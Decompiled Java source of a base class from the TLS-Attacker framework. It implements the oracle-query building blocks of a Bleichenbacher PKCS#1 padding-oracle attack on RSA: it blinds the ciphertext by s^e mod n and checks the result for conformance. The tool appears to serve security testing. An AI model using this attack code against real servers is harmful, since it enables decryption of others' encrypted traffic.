/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.pkcs1;

import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.Pkcs1Oracle;
import java.math.BigInteger;
import java.security.interfaces.RSAPublicKey;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Pkcs1Attack {
    private static final Logger LOGGER = LogManager.getLogger();
    protected final Pkcs1Oracle oracle;
    protected final byte[] encryptedMsg;
    protected final RSAPublicKey publicKey;
    protected BigInteger c0;
    protected final int blockSize;
    protected BigInteger solution;
    protected BigInteger bigB;

    public Pkcs1Attack(byte[] msg, Pkcs1Oracle pkcsOracle) {
        this.encryptedMsg = (byte[])msg.clone();
        this.publicKey = (RSAPublicKey)pkcsOracle.getPublicKey();
        this.oracle = pkcsOracle;
        this.c0 = BigInteger.ZERO;
        this.blockSize = this.oracle.getBlockSize();
    }

    protected byte[] prepareMsg(BigInteger m, BigInteger si) {
        BigInteger tmp = this.multiply(m, si);
        byte[] msg = ArrayConverter.bigIntegerToByteArray((BigInteger)tmp, (int)this.blockSize, (boolean)true);
        return msg;
    }

    protected BigInteger multiply(BigInteger m, BigInteger si) {
        BigInteger tmp = !this.oracle.isPlaintextOracle() ? si.modPow(this.publicKey.getPublicExponent(), this.publicKey.getModulus()) : si;
        tmp = m.multiply(tmp);
        return tmp.mod(this.publicKey.getModulus());
    }

    protected boolean queryOracle(BigInteger message, BigInteger si) {
        byte[] msg = this.prepareMsg(message, si);
        LOGGER.info(ArrayConverter.bytesToHexString((byte[])msg));
        return this.oracle.checkPKCSConformity(msg);
    }

    protected boolean queryOracle(BigInteger message) {
        byte[] msg = ArrayConverter.bigIntegerToByteArray((BigInteger)message, (int)this.blockSize, (boolean)true);
        return this.oracle.checkPKCSConformity(msg);
    }

    public BigInteger getSolution() {
        return this.solution;
    }
}

